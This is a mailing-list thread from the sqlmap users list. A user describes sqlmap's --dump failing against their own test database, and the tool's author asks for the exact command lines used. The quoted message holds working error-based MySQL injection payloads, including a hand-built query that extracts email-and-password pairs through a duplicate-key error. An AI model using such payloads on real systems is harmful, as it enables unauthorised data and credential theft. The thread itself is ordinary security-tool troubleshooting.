Hi Cats.

Just tried on MySQL/Error test case and it appears ok.

Could you please send exact command line(s) you've used (without target
url)? Please, use --flush-session as part of the first run.

Kind regards,
Miroslav Stampar

On Sat, Jan 7, 2012 at 1:06 AM, cats <d...@alcor.se> wrote:

> Hello!
>
> I was playing around with sqlmap at home, and I noticed all of a sudden
> that I couldn't get it to extract any columns or rows all of a sudden.
> Database names, current users, tables and such work fine, but
> extracting any columns with --dump doesn't work, and thus not getting
> any rows either. --columns seems to work though, although if I do that
> first and then --dump, it still won't work.
>
> Here's some output from sqlmap:
>
> At revision 4654.
>
> [00:47:11] [INFO] fetching columns 'strTest1, strTest2' for table 'test'
> on database 'testDB'
> [00:47:11] [ERROR] unable to retrieve the number of columns for table
> 'test' on database 'testDB'
> [00:47:11] [ERROR] unable to retrieve the columns for any table on
> database 'testDB'
> [00:47:11] [INFO] fetching column(s) 'strTest1, strTest2' entries for
> table 'test' on database 'testDB'
> [00:47:13] [WARNING] the SQL query provided does not return any output
> [00:47:13] [INFO] analyzing table dump for possible password hashes
> Database: testDB
> Table: test
> [0 entries]
> +----------+----------+
> | strTest1 | strTest2 |
> +----------+----------+
> +----------+----------+
>
>
> The vulnerability used by sqlmap is the following error based one:
>
> ---
> Place: GET
> Parameter: q
>    Type: error-based
>    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
>    Payload: q=2) AND (SELECT 2155 FROM(SELECT
> COUNT(*),CONCAT(0x3a6275763a,(SELECT (CASE WHEN (2155=2155) THEN 1 ELSE
> 0 END)),0x3a6b73693a,FLOOR(RAND(0)*2))x FROM
> INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3039=3039
> ---
>
> And if I try to extract data manually through my browser, then it works
> perfectly:
>
> Notice the extracted data: t...@mail.com:aPassword
>
> Duplicate entry t...@mail.com:aPassword :gtb:1' for key 'group_key'
> select * from test WHERE (StrTest1 = 2) AND (SELECT 2557 FROM(SELECT
> COUNT(*),CONCAT(strTest1,':',strTest2,(SELECT (CASE WHEN (2557=2557)
> THEN 1 ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test
> GROUP BY x)a) AND (8882=8882 AND fuser2 = 2) OR (test1 = 2 AND test2 =
> 2) AND (SELECT 2557 FROM(SELECT
> COUNT(*),CONCAT(strTest1,strTest2,(SELECT (CASE WHEN (2557=2557) THEN 1
> ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test GROUP BY
> x)a) AND (8882=8882)
>
> PS: I tried specifying with "-C strTest1,strTest2" as well
>
> Any ideas? :-)
>
> Thanks in advance, and thanks for a great tool (helps me a lot in my
> work, and saves me time from having to write my own scripts all the time
> to test my software)!
>
>
>
> ------------------------------------------------------------------------------
> Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex
> infrastructure or vast IT resources to deliver seamless, secure access to
> virtual desktops. With this all-in-one solution, easily deploy virtual
> desktops for less than the cost of PCs and save 60% on VDI infrastructure
> costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm